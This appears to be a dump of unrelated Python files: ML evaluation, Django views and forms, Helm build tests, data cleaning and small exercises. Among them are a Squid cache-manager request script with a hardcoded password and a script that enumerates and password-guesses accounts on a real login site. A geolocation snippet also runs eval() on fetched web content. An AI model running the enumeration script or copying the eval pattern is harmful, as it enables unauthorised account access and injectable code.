test_loader_1 = get_loader(cfg1.DATASET_TRPE, cfg1.PATH.EVAL, 'eval',label_path=cfg1.PATH.LABEL, cfg=cfg1.TRAIN, logger=logger)
from config_cub_2 import cfg2
logger = load_cfg(cfg2)
model_2 = get_network(cfg2.MODEL.NAME, cfg=cfg2.MODEL, logger=logger)
model_2 = torch.nn.DataParallel(model_2, cfg2.GPUS).cuda() if torch.cuda.is_available() else model_2
load_test_checkpoints(model_2, cfg2.PATH, logger, use_best=True)
acc_val = embedding(test_loader, test_loader_1, model,model_1,model_2, logger)
logger.info("Embedding Prec@1:%.4f"%(acc_val))
else:
print ("Usage: python test.py [eval, test]")
|
import time
import base64
#Retrieve Squid proxy info
HOST_IP = input("[+] Enter squid host IP : ") or "10.10.10.200"
HOST_PORT = int(input("[+] Enter squid PORT (Default 3128) : ") or 3128)
CMD = input("[+] Enter command to execute (menu) : ") #or "menu"
#Default ones
HOST = "Host: " + HOST_IP
USER_AGENT = "User-Agent: squidclient/4.6"
ACCEPT = "Accept: */*"
URL = "GET cache_object://" + HOST_IP + ":" + str(HOST_PORT) + "/"+CMD+" HTTP/1.1"
#Credentials
creds = input("[+] Do you have any credentials ? [Y\\n]: ").lower() or "y"
if creds == "y":
USERNAME = input("[+] Enter squidclient username (Default cachemgr): ") or "cachemgr"
PASSWORD = input("[+] Enter squidclient password : ") or "Thah$Sh1"
str_b64 = USERNAME + ":" + PASSWORD
AUTHORIZATION = "Authorization: Basic " + base64.b64encode(bytes(str_b64.encode('ascii'))).decode('utf-8')
crafted_url = URL + "\r\n" + USER_AGENT + "\r\n" + HOST + "\r\n" + ACCEPT + "\r\n" + AUTHORIZATION + "\n\n"
else:
crafted_url = URL + "\r\n" + USER_AGENT + "\r\n" + HOST + "\r\n" + ACCEPT + "\n\n"
def netcat(host, port, content):
import socket
print("[+] Creating connection with squid proxy ... ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print("[+] Sending content ...")
s.sendall(content)
time.sleep(0.5)
res = ""
while True:
data = s.recv(1024)
if not data:
break
res += data.decode()
print(res)
print(res)
print("[+] Connection closed ...")
s.close()
netcat(HOST_IP, HOST_PORT, bytes(crafted_url.encode()))
#print(crafted_url)
|
import urllib
from urllib.request import urlopen
import re
import http.cookiejar
from http.cookiejar import CookieJar
import time
import html5lib
import requests
import webbrowser
from bs4 import BeautifulSoup
#begin = input('Enter beginning number ')
#end = input('Enter ending number ')
begin = 300
end = 399
mgh_list = []
for i in range(begin,end):
mghid = 'mgh'+str(i)
#print (mghid)
url = 'https://phc.prontonetworks.com/cgi-bin/authlogin'
r = requests.get(url)
#count = 0
payload = {'userId':mghid,'password':mghid,'serviceName':'ProntoAuthentication','Submit22':'Login'}
r = requests.post(url, data=payload)
soup = BeautifulSoup(r.content)
list_item = soup.find_all("td",{"class":"errorText10"})
#print(list_item[0])
if 'Sorry, that password was not accepted.' in str(list_item[0]):
print('Account exists - ',mghid)
mgh_list.append(mghid)
elif 'Sorry, that account does not exist.' in str(list_item[0]):
print('Account does not exist')
'''
if (soup.title == None):
print (mghid + 'Fail!')
elif(soup.title.string == 'Successful Pronto Authentication'):
print (mghid + 'Success!')
'''
'''
for i in range(begin,end):
mghid = 'mgh'+str(i)
print (mghid)
url = 'https://phc.prontonetworks.com/cgi-bin/authlogin'
r = requests.get(url)
payload = {'userId':mghid,'password':'123456','serviceName':'ProntoAuthentication','Submit22':'Login'}
#payload = {'sarav92711':'userId','qwerty':'password','ProntoAuthentication':'serviceName','Login':'Submit22'}
r = requests.post(url, data=payload)
soup = BeautifulSoup(r.content)
if (soup.title == None):
print (mghid + 'Fail!')
elif(soup.title.string == 'Successful Pronto Authentication'):
print (mghid + 'Success!')
url_out = 'https://phc.prontonetworks.com/cgi-bin/authlogout'
r = requests.get(url_out)
'''
|
""" Script to read the 'original' ROOT file from Julia's GENIE simulation and convert it to a ROOT-file, which can be
read from the DSNB-NC.exe generator of the JUNO offline software.
The ROOT-file, which is generated with this script can be used as input for the DSNB-NC.exe generator.
"""
# import ROOT
import datetime
# import glob
import NC_background_functions
import numpy as np
from matplotlib import pyplot as plt
# set the path of the inputs:
input_path = "/home/astro/blum/juno/atmoNC/data_Julia/"
# file name of the input file:
input_name = input_path + "gntp.101.gst.root"
# set the path, where the outputs are saved:
output_path = "/home/astro/blum/juno/atmoNC/data_NC/"
NC_background_functions.convert_genie_file_for_generator(input_name, output_path)
|
# -*- coding: utf-8 -*-
num1=[]
num2=[]
print("Create tuple1:")
while True:
num=int(input())
if num == -9999:
break
num1.append(num)
print("Create tuple2:")
while True:
num=int(input())
if num == -9999:
break
num2.append(num)
numtotal=num1[:]
numtotal.extend(num2)
numsort=numtotal[:]
numsort.sort()
print(numtotal)
print("Combined tuple before sorting:",tuple(numtotal))
print("Combined list after sorting:",numsort) |
from .birthday import Birthday
def setup(bot):
bot.add_cog(Birthday(bot))
|
#import module argv for command line input
from sys import argv
#assign variables from command line input
script, filename = argv
#assign var txt to function open(). opens filename variable from command-line input
txt = open(filename)
#simple print of the name of the textfile
print "Here's your file %r:" % filename
#uses function .read() with no parameters to go through the textfile
print txt.read()
#simple print statement asking for reassurance
print "Type the filename again:"
#2nd variable assigned for input using prompt '> ' looking for textfile
file_again = raw_input("> ")
#Another variable used to store open()'s return output of the file
txt_again = open(file_again)
#uses .read() to go through the file and output it to us
print txt_again.read() |
from django.conf.urls import *
from media.views import *
from django.conf import settings
from django.contrib import admin
import os.path
from django.views.generic import TemplateView
from django.conf.urls.static import static
from media import rest
from media.rest import *
from rest_framework import routers
from rest_framework.authtoken import views
site_media = os.path.join(
os.path.dirname(__file__), 'site_media'
)
admin.autodiscover()
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^$', main_page),
url(r'^tags=(\w+)$', main_page),
url(r'^embed/(\d+)/$', embed_page),
url(r'^login/$', login_page),
url(r'^user/(\w+)/$', user_page),
url(r'^logout/$', logout_page),
url(r'^download/', download),
url(r'^changeviews/',changeviews),
url(r'^delete_media/',delete_media),
url(r'^favorite/',favorite),
url(r'^delete_favorite/',delete_favorite),
url(r'^more_space/', more_space),
# (r'^featured/', featured),
url(r'^categories/([\w.]{0,256})/$', main_page),
url(r'^logthis/', logthis),
url(r'^v/(\d+)/$',main_page),
url(r'^360/$', TemplateView.as_view(template_name='360.html')),
url(r'^api-token-auth/', views.obtain_auth_token),
url(r'^rest/media/(?P<numvids>[0-9]+)$', rest.MediaList.as_view()),
url(r'^rest/media/$', rest.MediaList.as_view()),
#Admin
] + static(settings.STATIC_URL, document_user=settings.STATIC_user)
|
from agrupamento.kmeans import AlgoritmoDeKMeans
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import MinMaxScaler
import numpy as np
import pandas as pd
print("Agrupamento de vendas de jogos com k-means")
print("Receba indicações de games para jogar com base na plataforma e no gênero")
print()
file = "dataset/dataset.csv"
dataset = pd.read_csv(file)
pd.set_option('display.max_columns', 11)
# altera nomes de colunas
dataset.columns = ["ranking", "nome", "plataforma", "ano", "genero", "editora", "vendas_america_norte", "vendas_eu", "vendas_japao", "vendas_outros_paises", "vendas_totais"]
# info_dataset é um dataset para ser usado em opções do menu
info_dataset = dataset[["nome", "plataforma", "ano", "genero", "editora"]]
# mostra alguns itens do dataset
# print(dataset.head())
# confere valores vazios no dataset
# print(dataset.isna().sum())
# para usar com o k-means pega dataset de vendas com plataforma e gênero. Nome servirá para ser o índice
vendas_dataset = dataset[["nome", "plataforma", "genero"]]
# print(vendas_dataset.head())
# print(vendas_dataset.isna().sum())
# por existirem poucas informações vazias em plataforma e gênero, 26 para cada, retira as linhas com essas informações
vendas_dataset = vendas_dataset.dropna()
# salva a coluna de nomes
nomes = vendas_dataset["nome"]
nomes = nomes.values
# antes de continuar, seta índice como o nome, não existem linhas sem informação a respeito disso
vendas_dataset.set_index(keys="nome", inplace=True)
# faz o mesmo para info_dataset
info_dataset.set_index(keys="nome", inplace=True)
# transforma as colunas com valores não numéricos em valores numéricos
# primeiro com plataforma
vendas_dataset["plataforma"] = vendas_dataset["plataforma"].astype(str)
label_encoder_p = LabelEncoder()
label_encoder_p.fit(vendas_dataset["plataforma"])
vendas_dataset["plataforma"] = label_encoder_p.transform(vendas_dataset["plataforma"])
# agora com genero
vendas_dataset["genero"] = vendas_dataset["genero"].astype(str)
label_encoder_g = LabelEncoder()
label_encoder_g.fit(vendas_dataset["genero"])
vendas_dataset["genero"] = label_encoder_g.transform(vendas_dataset["genero"])
# print(vendas_dataset.info())
# print(vendas_dataset.isna().sum())
# scaler
scaler = MinMaxScaler()
vendas_dataset_escalado = scaler.fit_transform(vendas_dataset)
vendas_dataset_escalado = pd.DataFrame(vendas_dataset_escalado)
# adiciona novamente a coluna de nomes e seta de novo ela como índice
vendas_dataset_escalado["nome"] = nomes
vendas_dataset_escalado.set_index(keys="nome", inplace=True)
# inicia parte do k-means
k_means = AlgoritmoDeKMeans(vendas_dataset_escalado)
vendas_dataset_result = k_means.insere_coluna_de_grupo(vendas_dataset_escalado)
# menu
menu = "Menu \nop1. Encontra o erro em 30 possibilidades diferentes, de 1 a 30 grupos \nop2. Verifica os valores dos centros encontrados pelo algoritmo \nop3. Mostra indicações de um grupo a sua escolha (1 a 14) \nop0. Finaliza programa"
resposta = ""
while (True):
print()
print(menu)
resposta = input("escolha uma alternativa: ")
if (resposta=="op1"):
print("Encontra o erro em 30 possibilidades diferentes, de 1 a 30 grupos")
k_means.mostra_erro_com_30_grupos_diferentes(vendas_dataset_escalado)
if (resposta=="op2"):
print("Verifica os valores dos centros encontrados pelo algoritmo")
print(k_means.retorna_centros())
if (resposta=="op3"):
print("Mostra indicações de um grupo a sua escolha (1 a 14)")
n_grupo=-1
while(True):
str_n_grupo = input("escolha um grupo de 1 a 14")
n_grupo = int(str_n_grupo)
n_grupo = n_grupo-1
if (n_grupo>=0 and n_grupo<=13):
break
print("Grupo escolhido: %d" % n_grupo)
k_means.mostra_jogos_de_um_grupo(n=n_grupo, dataset_k_means=vendas_dataset_result, dataset_completo=info_dataset)
if (resposta=="op0"):
break
print("\n\nPrograma finalizado")
|
import numpy as np
import osmo_camera.rgb.convert as module
def test_convert_to_bgr():
image = np.array(
[
[["r1", "g1", "b1"], ["r2", "g2", "b2"]],
[["r3", "g3", "b3"], ["r4", "g4", "b4"]],
]
)
expected = np.array(
[
[["b1", "g1", "r1"], ["b2", "g2", "r2"]],
[["b3", "g3", "r3"], ["b4", "g4", "r4"]],
]
)
np.testing.assert_array_equal(module.to_bgr(image), expected)
class TestConvertToPIL(object):
def test_convert_to_PIL_no_warnings(self, mocker):
mock_warning_logger = mocker.patch.object(module.logger, "warning")
image = np.array([[[0, 0.5, 1], [1, 0.3, 0.1]]])
expected = np.array([[[0, 127, 255], [255, 76, 25]]]).astype("uint8")
PIL_image = module.to_PIL(image)
np.testing.assert_array_equal(np.array(PIL_image), expected)
mock_warning_logger.assert_not_called()
def test_convert_to_PIL_with_warnings(self, mocker):
mock_warning_logger = mocker.patch.object(module.logger, "warning")
image = np.array([[[0, 0.5, 1], [1, 3, -0.1]]])
expected = np.array(
[
# Check overflow values truncate properly:
# 3 from input array should be the maximum value
# -0.1 from input array should be the minimum value
[[0, 127, 255], [255, 255, 0]]
]
).astype("uint8")
PIL_image = module.to_PIL(image)
np.testing.assert_array_equal(np.array(PIL_image), expected)
mock_warning_logger.assert_called_once()
|
#!/usr/bin/python3
#minimalist python pe library
import sys
import argparse
import struct
from Utils import spaces
import DOSHeader
import PEImageOptHeader
import DOSHeaderDecoder
import PEHeaderDecoder
import PEDataDirDecoder
class PEDataDirHeader:
__PEDataDirHeader_fmt_dict = {\
"VirtualAddress":"I",\
"Size":"I"}
__PEDataDirHeader_fields = ["VirtualAddress",\
"Size"]
__PE32_offset = 96
__PE32_plus_offset = 112
def __init__(self,_opt_header=None):
self.attribute_list = [ [("VirtualAddress",0),("Size",0)] ] #array of data dir
self.opt_header = _opt_header
if (self.opt_header):
self.count = self.opt_header.get_numberofrvaandsizes()
#should check the PEOptHeaer
self.set_offset(self.opt_header.len + self.opt_header.offset) #use upper header read lengths, then check if magic is set properly
if (_opt_header.is32Bit()):
self.set_offset(PEDataDirHeader().__PE32_plus_offset)
else:
self.set_offset(PEDataDirHeader().__PE32_offset)
self.header_fields = PEDataDirHeader.__PEDataDirHeader_fields
self.header_fmt_dict = PEDataDirHeader.__PEDataDirHeader_fmt_dict
def build_from_binary(self,_filename="",_fileperms="rb"):
if (_filename != ""):
self.filename = _filename
opt_decoder = PEDataDirDecoder.Decoder(_filename=self.filename,\
_fileperms=self.fileperms)
opt_header,length = opt_decoder.decode(_start=self.offset,_count=self.count)
self.len = length
if (opt_header == None or self.count == 0):
return self.attribute_list
for index,value in enumerate(opt_header):#might need to undo this hack one day lol
try:
for dir_index,datadir in enumerate(value):
VirtualAddress_name = self.attribute_list[dir_index][0][0] #the data struture choice a messy choice here at best
VirtualAddress_value = self.attribute_list[dir_index][0][1]
Size_name = self.attribute_list[dir_index][1][0]
Size_value = self.attribute_list[dir_index][1][1]
self.attribute_list[dir_index] = [(VirtualAddress_name,VirtualAddress_value),\
(Size_name,Size_value)]
except IndexError:
return self.attribute_list
return self.attribute_list
def get_offset(self):
return self.offset
def set_offset(self,_offset):
self.offset = _offset
def build_from_optheader(self):
if (not(self.opt_header)):
return None
self.filename = self.opt_header.filename
self.fileperms = self.opt_header.fileperms
self.offset = self.opt_header.offset + self.opt_header.len
self.count = self.opt_header.get_numberofrvaandsizes()
return self.build_from_binary()
def __repr__(self):
doc_string = "\tData Directory\n"
#for index,field in enumerate(self.header_fields):
# pred = len("\t|- %s => [%s]\n")
# subj = (field,hex(self.attribute_list[index][1]))
# _spaces = spaces(line_length=30,predicate=pred,subject=subj)
# doc_string += "\t|- %s =>%s[%s]\n" % (field,_spaces,hex(self.attribute_list[index][1]))
doc_string += "".join([datadir.__repr__() for datadir in self.attribute_list])
return doc_string
|
#common elements finder function
#define a functions which take 2 list as input and return a list
#which contains common elements of both lists
#example input [1,2,5,8], [1,2,7,6]
#output [1,2]
def common_elements(lista1,lista2):
listaEnd=[]
a=[]
if len(lista1)>len(lista2):
a=lista1
else:
a=lista2
for i in a:
if i in lista1 and i in lista2:
listaEnd.append(i)
return listaEnd
def common_finder(l1,l2):
output=[]
for i in l1:
if i in l2:
output.append(i)
return output
lista1=[1,2,5,8]
lista2=[1,2,7,6]
print(common_elements(lista1,lista2))
print(common_finder(lista1,lista2))
|
import dash_bootstrap_components as dbc
from dash import Input, Output, html
accordion = html.Div(
[
dbc.Accordion(
[
dbc.AccordionItem(
"This is the content of the first section. It has a "
"default ID of item-0.",
title="Item 1: item-0",
),
dbc.AccordionItem(
"This is the content of the second section. It has a "
"default ID of item-1.",
title="Item 2: item-1",
),
dbc.AccordionItem(
"This is the content of the third section. It has a "
"default ID of item-2.",
title="Item 3: item-2",
),
],
id="accordion-always-open",
always_open=True,
),
html.Div(id="accordion-contents-open-ids", className="mt-3"),
]
)
@app.callback(
Output("accordion-contents-open-ids", "children"),
[Input("accordion-always-open", "active_item")],
)
def change_item(item):
return f"Item(s) selected: {item}"
|
"""This module contains a class which has method to clean the data """
import numpy as np
import pandas as pd
#author: Muhe Xie
#netID: mx419
#date: 11/26/2015
class Clean_Raw_Data:
''' This class contains the origin data and a method to clean the data'''
def __init__(self,origin_data):
'''the constructor will get the raw data'''
self.raw_data = origin_data
def get_cleaned_data(self):
'''the method will return a cleaned dataset for analysis'''
selected_data = self.raw_data[['CAMIS','BORO','GRADE','GRADE DATE']] #get the columns we need
selected_data_unique = selected_data.drop_duplicates() #drop duplicates
#get the rows with valid grades
selected_data_unique_valid_grade = selected_data_unique[(selected_data_unique['GRADE']=='A')|(selected_data_unique['GRADE']=='B')|(selected_data_unique['GRADE']=='C')]
selected_data_final = selected_data_unique_valid_grade.dropna()
#clean the data with missing boro value
selected_data_final = selected_data_final[selected_data_final['BORO']!='Missing']
#create a new dataframe contain the formatted time. Then concatenate the two dataframe
#directly add a column to the dataframe based on one existed column will cause slice warning
Format_Date_Df = pd.DataFrame(pd.to_datetime(selected_data_final['GRADE DATE']))
Format_Date_Df.rename(columns={'GRADE DATE': 'FORMAT_DATE'}, inplace=True)
combined_df = pd.concat([selected_data_final, Format_Date_Df], axis=1)
return combined_df
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.docker.target_types import (
DockerImageTags,
DockerImageTagsRequest,
DockerImageTarget,
)
from pants.backend.helm.dependency_inference import deployment as infer_deployment
from pants.backend.helm.subsystems.post_renderer import (
HELM_POST_RENDERER_CFG_FILENAME,
HelmPostRenderer,
)
from pants.backend.helm.target_types import (
HelmChartTarget,
HelmDeploymentFieldSet,
HelmDeploymentTarget,
)
from pants.backend.helm.testutil import HELM_CHART_FILE, HELM_TEMPLATE_HELPERS_FILE
from pants.backend.helm.util_rules import post_renderer
from pants.backend.helm.util_rules.post_renderer import HelmDeploymentPostRendererRequest
from pants.backend.helm.util_rules.renderer import (
HelmDeploymentCmd,
HelmDeploymentRequest,
RenderedHelmFiles,
)
from pants.backend.helm.util_rules.testutil import _read_file_from_digest
from pants.backend.helm.util_rules.tool import HelmProcess
from pants.backend.shell.target_types import ShellCommandRunTarget, ShellSourcesGeneratorTarget
from pants.backend.shell.util_rules import shell_command
from pants.core.goals import package
from pants.core.goals.run import rules as run_rules
from pants.core.util_rules import source_files
from pants.engine.addresses import Address
from pants.engine.fs import CreateDigest, Digest, FileContent
from pants.engine.process import ProcessResult
from pants.engine.rules import QueryRule, rule
from pants.engine.target import Target
from pants.engine.unions import UnionRule
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, RuleRunner
class CustomTestImageTagRequest(DockerImageTagsRequest):
@classmethod
def is_applicable(cls, target: Target) -> bool:
return "bar" in target.address.target_name
@rule
async def custom_test_image_tags(_: CustomTestImageTagRequest) -> DockerImageTags:
return DockerImageTags(["custom-tag"])
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
target_types=[
HelmChartTarget,
HelmDeploymentTarget,
DockerImageTarget,
ShellSourcesGeneratorTarget,
ShellCommandRunTarget,
],
rules=[
*infer_deployment.rules(),
*source_files.rules(),
*post_renderer.rules(),
*run_rules(),
*shell_command.rules(),
*package.rules(),
custom_test_image_tags,
UnionRule(DockerImageTagsRequest, CustomTestImageTagRequest),
QueryRule(HelmPostRenderer, (HelmDeploymentPostRendererRequest,)),
QueryRule(RenderedHelmFiles, (HelmDeploymentRequest,)),
QueryRule(ProcessResult, (HelmProcess,)),
],
)
source_root_patterns = ("src/*",)
rule_runner.set_options(
[f"--source-root-patterns={repr(source_root_patterns)}"],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
return rule_runner
_TEST_GIVEN_CONFIGMAP_FILE = dedent(
"""\
apiVersion: v1
kind: ConfigMap
metadata:
name: foo-config
data:
foo_key: foo_value
"""
)
_TEST_EXPECTED_CONFIGMAP_FILE = (
dedent(
"""\
---
# Source: mychart/templates/configmap.yaml
"""
)
+ _TEST_GIVEN_CONFIGMAP_FILE
)
def test_can_prepare_post_renderer(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/mychart/BUILD": "helm_chart()",
"src/mychart/Chart.yaml": HELM_CHART_FILE,
"src/mychart/values.yaml": dedent(
"""\
pods: []
"""
),
"src/mychart/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
"src/mychart/templates/configmap.yaml": _TEST_GIVEN_CONFIGMAP_FILE,
"src/mychart/templates/pod.yaml": dedent(
"""\
{{- $root := . -}}
{{- range $pod := .Values.pods }}
---
apiVersion: v1
kind: Pod
metadata:
name: {{ template "fullname" $root }}-{{ $pod.name }}
labels:
chart: "{{ $root.Chart.Name }}-{{ $root.Chart.Version | replace "+" "_" }}"
spec:
initContainers:
- name: myapp-init-container
image: {{ $pod.initContainerImage }}
containers:
- name: busy
image: busybox:1.29
- name: myapp-container
image: {{ $pod.appImage }}
{{- end }}
"""
),
"src/deployment/BUILD": "helm_deployment(name='test', dependencies=['//src/mychart'])",
"src/deployment/values.yaml": dedent(
"""\
pods:
- name: foo
initContainerImage: src/image:init_foo
appImage: src/image:app_foo
- name: bar
initContainerImage: src/image:init_bar
appImage: src/image:app_bar
"""
),
"src/image/BUILD": dedent(
"""\
docker_image(name="init_foo", source="Dockerfile.init")
docker_image(name="app_foo", source="Dockerfile.app")
docker_image(name="init_bar", source="Dockerfile.init")
docker_image(name="app_bar", source="Dockerfile.app")
"""
),
"src/image/Dockerfile.init": "FROM busybox:1.28",
"src/image/Dockerfile.app": "FROM busybox:1.28",
}
)
expected_config_file = dedent(
"""\
---
mychart/templates/pod.yaml:
- paths:
/spec/containers/1/image: app_foo:latest
/spec/initContainers/0/image: init_foo:latest
- paths:
/spec/containers/1/image: app_bar:custom-tag
/spec/initContainers/0/image: init_bar:custom-tag
"""
)
expected_rendered_pod = dedent(
"""\
---
# Source: mychart/templates/pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: test-mychart-foo
labels:
chart: mychart-0.1.0
spec:
initContainers:
- name: myapp-init-container
image: init_foo:latest
containers:
- name: busy
image: busybox:1.29
- name: myapp-container
image: app_foo:latest
---
# Source: mychart/templates/pod.yaml
apiVersion: v1
kind: Pod
metadata:
name: test-mychart-bar
labels:
chart: mychart-0.1.0
spec:
initContainers:
- name: myapp-init-container
image: init_bar:custom-tag
containers:
- name: busy
image: busybox:1.29
- name: myapp-container
image: app_bar:custom-tag
"""
)
deployment_addr = Address("src/deployment", target_name="test")
tgt = rule_runner.get_target(deployment_addr)
field_set = HelmDeploymentFieldSet.create(tgt)
post_renderer = rule_runner.request(
HelmPostRenderer,
[HelmDeploymentPostRendererRequest(field_set)],
)
config_file = _read_file_from_digest(
rule_runner, digest=post_renderer.digest, filename=HELM_POST_RENDERER_CFG_FILENAME
)
assert config_file == expected_config_file
rendered_output = rule_runner.request(
RenderedHelmFiles,
[
HelmDeploymentRequest(
field_set=field_set,
cmd=HelmDeploymentCmd.RENDER,
description="Test post-renderer output",
post_renderer=post_renderer,
)
],
)
assert "mychart/templates/pod.yaml" in rendered_output.snapshot.files
assert "mychart/templates/configmap.yaml" in rendered_output.snapshot.files
rendered_configmap_file = _read_file_from_digest(
rule_runner,
digest=rendered_output.snapshot.digest,
filename="mychart/templates/configmap.yaml",
)
assert rendered_configmap_file == _TEST_EXPECTED_CONFIGMAP_FILE
rendered_pod_file = _read_file_from_digest(
rule_runner, digest=rendered_output.snapshot.digest, filename="mychart/templates/pod.yaml"
)
assert rendered_pod_file == expected_rendered_pod
def test_use_simple_extra_post_renderer(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/mychart/BUILD": "helm_chart()",
"src/mychart/Chart.yaml": HELM_CHART_FILE,
"src/mychart/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
"src/mychart/templates/configmap.yaml": _TEST_GIVEN_CONFIGMAP_FILE,
"src/shell/BUILD": dedent(
"""\
shell_sources(name="scripts")
run_shell_command(
name="custom_post_renderer",
command="src/shell/my-script.sh",
execution_dependencies=[":scripts"]
)
"""
),
"src/deployment/BUILD": dedent(
"""\
helm_deployment(
name="test",
dependencies=["//src/mychart"],
post_renderers=["//src/shell:custom_post_renderer"]
)
"""
),
}
)
# We need to create the post-renderer script as a digest to ensure it has running permissions.
post_renderer_script_digest = rule_runner.request(
Digest,
[
CreateDigest(
[
FileContent(
path="src/shell/my-script.sh",
content=dedent(
"""\
#!/bin/bash
cat <&0
"""
).encode(),
is_executable=True,
)
]
)
],
)
rule_runner.write_digest(post_renderer_script_digest)
deployment_addr = Address("src/deployment", target_name="test")
tgt = rule_runner.get_target(deployment_addr)
field_set = HelmDeploymentFieldSet.create(tgt)
post_renderer = rule_runner.request(
HelmPostRenderer,
[HelmDeploymentPostRendererRequest(field_set)],
)
rendered_output = rule_runner.request(
RenderedHelmFiles,
[
HelmDeploymentRequest(
field_set=field_set,
cmd=HelmDeploymentCmd.RENDER,
description="Test post-renderer output",
post_renderer=post_renderer,
)
],
)
assert "mychart/templates/configmap.yaml" in rendered_output.snapshot.files
rendered_configmap_file = _read_file_from_digest(
rule_runner,
digest=rendered_output.snapshot.digest,
filename="mychart/templates/configmap.yaml",
)
assert rendered_configmap_file == _TEST_EXPECTED_CONFIGMAP_FILE
|
from django import forms
from django.forms import ModelForm
from django.contrib.auth.models import User
from .models import UserProfile
class RegistrationForm(ModelForm):
class Meta:
model = User
fields = ['username', 'first_name', 'last_name', 'email', 'password']
widgets = {
'username': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'autofocus':'', 'placeholder' : 'Username'}),
'first_name': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'First Name'}),
'last_name': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'Last Name'}),
'email': forms.TextInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'Email'}),
'password': forms.PasswordInput(attrs={'class' : "form-control", 'required': '', 'placeholder' : 'Password'}),
}
def save(self, commit=True):
user = super(ModelForm,self).save(commit = False)
user.set_password(self.cleaned_data['password'])
if commit:
user.save()
return user
class UserProfileForm(forms.ModelForm):
dob = forms.DateField(widget=forms.SelectDateWidget(years=range(2016,1939,-1), attrs={'class':"form-control", 'required':''}))
class Meta:
model = UserProfile
fields = ('gender', 'bio', 'dob', 'location', 'display_pic')
exclude = ('user', )
widgets = {
'gender' : forms.TextInput(attrs = {'class': "form-control", 'maxlength':1, 'autofocus':'', 'placeholder': 'Gender'}),
'bio' : forms.Textarea(attrs = {'class': "form-control", 'maxlength':160, 'placeholder': 'Bio'}),
'location' : forms.TextInput(attrs = {'class': "form-control", 'maxlength':50, 'placeholder': 'Location'}),
}
|
#!/usr/bin/env python
import logging
import os
import json
import boto3
from aws import update_ssm_params
logging.getLogger("boto3").setLevel(logging.ERROR)
logging.getLogger("botocore").setLevel(logging.ERROR)
LOGFMT = (
"[%(levelname)s] %(asctime)s.%(msecs)dZ {aws_request_id} " "%(thread)d %(message)s"
)
DATEFMT = "%Y-%m-%dT%H:%M:%S"
def configure_logging(
log_context, log_level=logging.INFO, logfmt=LOGFMT, datefmt=DATEFMT
):
"""Configure logging."""
logfmt = logfmt.format(**log_context)
while logging.root.handlers:
logging.root.removeHandler(logging.root.handlers[-1])
logging.basicConfig(level=log_level, datefmt=datefmt, format=logfmt)
logging.getLogger("boto3").setLevel(logging.ERROR)
logging.getLogger("botocore").setLevel(logging.ERROR)
return logging.getLogger()
def lambda_handler(event, context):
"""Lambda Entrypoint."""
configure_logging(
{"aws_request_id": context.aws_request_id},
logfmt=LOGFMT,
datefmt=DATEFMT,
log_level=logging.INFO,
)
return main(event, context)
def main(event, context):
logging.info(event)
asg_name = json.loads(
boto3.client("ssm").get_parameter(
Name=os.environ["ASG_NAMES_PATH"], WithDecryption=True
)["Parameter"]["Value"]
)
logging.info(asg_name)
update_ssm_params(asg_name)
if __name__ == "__main__":
configure_logging(
{"aws_request_id": "local"},
logfmt=LOGFMT,
datefmt=DATEFMT,
log_level=logging.INFO,
)
os.environ["ASG_NAMES_PATH"] = '/bastion/asg_names'
print(main(None, None))
|
from requests import get
def getgeo():
ip=raw_input('Enter ip or hostname to locate: ')
if ip=='': ip=get('https://api.ipify.org').content
for (k,v) in eval(get('https://freegeoip.net/json/'+ip).content).iteritems():
print '{:<13}: {}'.format(k.replace('_',' ').title(),v) |
def pig_latin(word):
return word[1:] + word[0] + 'ay' if len(word) > 3 else word
'''
Task:
Make a function that converts a word to pig latin. The rules of pig latin are:
If the word has more than 3 letters:
1. Take the first letter of a word and move it to the end
2. Add -ay to the word
Otherwise leave the word alone.
Example: hello = ellohay
'''
|
class Solution(object):
def rangeBitwiseAnd(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
"""
if m == n:
return m
result = m
for num in range(m+1, n+1):
result &= num
return result
obj = Solution()
m, n = 5, 7
result = obj.rangeBitwiseAnd(0, 1)
print(result) |
# Generated by Django 2.2.7 on 2019-11-26 19:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('info', '0009_auto_20191123_2357'),
]
operations = [
migrations.AddField(
model_name='category',
name='url',
field=models.CharField(default='', max_length=64),
),
migrations.AddField(
model_name='compensation',
name='url',
field=models.CharField(default='', max_length=64),
),
]
|
Dial = input()
ans = 0
for i in Dial:
if ord(i) in [65,66,67]:
ans += 3
elif ord(i) in [68,69,70]:
ans += 4
elif ord(i) in [71,72,73]:
ans += 5
elif ord(i) in [74,75,76]:
ans += 6
elif ord(i) in [77,78,79]:
ans += 7
elif ord(i) in [80,81,82,83]:
ans += 8
elif ord(i) in [84,85,86]:
ans += 9
else:
ans += 10
print(ans)
# Done
|
# Import all required libaries
import streamlit as st
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
import numpy as np
import cv2
import os
from PIL import Image
import matplotlib.image as mpimg
import urllib
# Operating system dependencies
os.environ['KMP_DUPLICATE_LIB_OK']='True'
st.set_option('deprecation.showfileUploaderEncoding', False)
# Streamlit encourages well-structured code, like starting execution in a main() function.
def main():
# Render the readme as markdown using st.markdown.
readme_text = st.markdown(get_file_content_as_string("instructions.md"))
# Once we have the dependencies, add a selector for the app mode on the sidebar.
st.sidebar.title("What to do")
app_mode = st.sidebar.selectbox("Choose the app mode",
["Show instructions", "Run the video detector", "Run the image detector", "Show the source code"])
if app_mode == "Show instructions":
st.sidebar.success('To continue select "Run the app".')
